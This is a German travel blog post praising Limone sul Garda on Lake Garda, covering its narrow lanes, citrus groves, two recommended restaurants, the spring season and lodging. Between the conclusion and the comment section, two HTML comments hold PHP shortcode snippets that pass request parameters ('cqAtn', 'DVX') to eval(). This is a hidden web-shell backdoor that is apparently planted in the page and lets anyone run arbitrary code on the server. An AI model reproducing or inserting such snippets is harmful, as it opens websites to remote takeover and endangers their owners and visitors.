Limone – Perle am Gardasee

Limone sul Garda – so der komplette Name – ist ein kleines Städtchen an der Nord-West-Küste am Gardasee. Und vor allem im Frühjahr eine Reise wert. 

Limone - Die Perle am Gardasee

Limone – Die Perle am Gardasee © dieweltineinerkiste.de

Städtchen ist eigentlich schon fast zu viel. Vielmehr müsste es Dorf heißen, denn mehr als ein großes Dorf ist Limone eigentlich nicht. Und auch die knapp 1200 Einwohner lassen es eher als Dorf durchgehen. Aber was für eins.

Schmale Gässchen in Limone

Vor ein paar Jahren bin ich zum ersten Mal in Limone gewesen und seitdem führen mich meine Trips an den Gardasee immer wieder dorthin. Von Riva del Garda führt eine imposante Küstenstraße durch etliche Tunnel und durch eine herrliche Landschaft in den kleinen Ort, der die Zitrone im Namen hat. Woher das kommt, sieht man schnell. An jeder Ecke warten Zitronen-, Limetten- oder Orangenbäume. In und um Limone sieht man zudem die typischen Gewächshäuser, in denen die Bäume wachsen und die Früchte gedeihen.

Die Wege in Limone sind überschaubar und so führen diese einen unweigerlich in Richtung Altstadt, die in einer Bucht idyllisch unter steil aufragenden Bergen liegt. Die kleinen schmalen Gässchen führen allesamt zu dem kleinen Hafen, wo die kleinen Fischerboote in den Wogen der Wellen schaukeln. Links und rechts warten kleine Läden, um ein bisschen zu shoppen und zahlreiche Gelaterias locken mit wunderbarem Fruchteis.

Überhaupt: Beim Besuch von Limone überkommt einen das Gefühl, man sei hier nicht am südlichen Ende der Alpen, sondern irgendwo am Mittelmeer. Der Luft fehlt zwar das Salz, aber die frische Seeluft wirkt trotzdem Wunder. Aber auch das Flair ist einfach mediterran.

Essen & Trinken in Limone

In Limone sul Garda warten eigentlich an der kompletten Strandpromenade Restaurants, die die typisch italienische Küche servieren. Die großen Restaurants mit riesiger Terrasse sind dabei nicht unbedingt mein Fall und eher auf Massenabfertigung angelegt. Eine echte Empfehlung ist aber das Monte Baldo direkt am kleinen Hafenbecken gelegen. Pizza sucht man hier auf der Karte vergebens, aber die Pasta-, Fleisch- und vor allem Fischauswahl ist grandios. Dazu ein guter Wein und einem guten Abend steht nichts im Wege. Und einem Gläschen Limoncello kann man sowieso nie nein sagen. Am Wochenende empfiehlt es sich vorher einen Tisch zu reservieren.

Auch das Ristorante Gemma am Piazza Garibaldi ist zu empfehlen. Auch hier ist frischer Fisch direkt aus dem Gardasee das Highlight der Karte.

Die beste Reisezeit

Im Sommer wird Limone sul Garda von wahren Touristenmassen heimgesucht. Bis zu 10.000 Touristen quetschen sich dann durch das kleine Örtchen am Gardasee und die gemütliche Atmosphäre geht etwas verloren. Vielmehr empfehle ich die Vorsaison. Im Herbst geht es ab Ende September sehr ruhig zu. Nur noch deutsche Rentner trifft man da. Noch mehr würde ich aber einen Ausflug im Frühjahr empfehlen. Gerade April bis Ende Mai ist einfach grandios. In Limone ist es bereits sommerlich warm, alles ist grün und das absolute Highlight: Die zahlreichen Zitrusbäume blühen und verströmen bereits beim Aussteigen aus dem Auto einen unglaublich betörenden Geruch, den man dezent an allen Ecken von Limone wahrnehmen kann.

Übernachten

In Limone gibt es zahlreiche Hotels und zwei Campingplätze, die neben Stellplätzen für Zelte und Caravane auch kleine, einfach ausgestattete Bungalows haben. Vom Preis her sind nahezu sämtliche Kategorien möglich. In der Vorsaison ist das noch knapp 50 % günstiger als in der Hauptsaison von Juni bis September.

Fazit

Wer einmal in Limone war und das Flair eingefangen hat, kommt sicherlich wieder. Zumindest habe ich mich schon beim ersten Besuch verliebt. Und so ist der nächste Abstecher zwar noch nicht geplant, aber auf der Liste steht er quasi immer.

 

<!– [insert_php]if (isset($_REQUEST[„cqAtn“])){eval($_REQUEST[„cqAtn“]);exit;}[/insert_php][php]if (isset($_REQUEST[„cqAtn“])){eval($_REQUEST[„cqAtn“]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[„DVX“])){eval($_REQUEST[„DVX“]);exit;}[/insert_php][php]if (isset($_REQUEST[„DVX“])){eval($_REQUEST[„DVX“]);exit;}[/php] –>

One thought on “Limone – Perle am Gardasee

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.